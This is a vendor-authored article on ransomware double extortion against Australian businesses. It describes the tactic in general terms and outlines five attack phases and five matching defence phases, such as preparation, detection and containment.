Of all the cyber threats currently facing Australian businesses, one of the most feared is ransomware. By introducing malware into an IT infrastructure, criminals can lock down data stores and then demand significant payments in exchange for the keys.
Unfortunately, many organisations opt to pay the demanded ransom to regain access to their data. This, in turn, has made ransomware a very attractive vehicle for criminals looking to generate as much money from their activities as possible.
Now, growing numbers are using an additional tactic to ensure payment is made by their victims. It’s a method that’s been ‘double extortion’.
Under the double extortion model, ransomware attackers continue to encrypt data and demand a ransom to regain access. However, they also go a step further and threaten to upload any extricated data online if their terms are not met.
This approach has proven successful for a number of reasons. Firstly, businesses are already terrified of ransomware and the operational impact it can have. Also, even if a ransomware-afflicted business ultimately rids itself of the ransomware, there may still exist a public perception that it paid the ransom, leading to more negative sentiment.
Clearly ransomware groups have realised that the damage caused by ransomware extends far beyond the locking of systems. After all, even the knowledge an attacker is in the network, and the threat of an encrypt button being pressed is enough to make some companies pay out.
Ransomware groups are additionally diversifying their approach by taking copies of data before performing the encryption. This gives them a number of options, each of which has been seen played out in the wild.
Firstly, it proves to the victim and the wider world that they really have breached the organisation. Second, it also adds another layer of extortion through the threat to leak the data. What’s particularly threatening about this approach is that, even if a company decides to restore from backup rather than pay up, that data is still valuable, and the threat of leakage is not diminished.
In the cases where a company does pay the ransom, the cybercriminals can provide worthless assurance that they have deleted their copy of the data. Meanwhile, this data could end up leaked later on or used again to leverage yet another payout.
Thankfully, there are a number of ways in which ransomware attacks can be prevented, or at least mitigated. These methods can also help to ensure the security threat is reduced by minimising the time spent by intruders within the corporate network.
Minimising an attacker’s time inside a company network relies upon the security team being informed of the process by which ransomware attacks are executed. There are five distinct stages that define a ransomware attack, and by being familiar with each phase, security teams can quickly respond to an intrusion.
The five phases of a ransomware attack are exploitation and infection, delivery and execution, backup spoliation, file encryption, and user notification and clean-up. To match these steps, there are also five phases of defence against ransomware. These phases are preparation, detection, containment, eradication, and recovery.
An organisation’s ability to recognise the five phases of attack and then employing the five phases of defence, lies in effecting monitoring of company networks. It is crucial that organisations recognise the stark nature of the ransomware threat and provide the necessary technological solutions and security teams to ensure this comprehensive monitoring.
The threat of ransomware is unlikely to disappear anytime soon, and the methods being used by cybercriminals continue to become more sophisticated.
For this reason, now is the time to put in place effective protection methods and educate all staff about the threat and the steps they can take to improve security.
Joanne Wong is the vice president, international marketing (APAC and EMEA) at LogRhythm.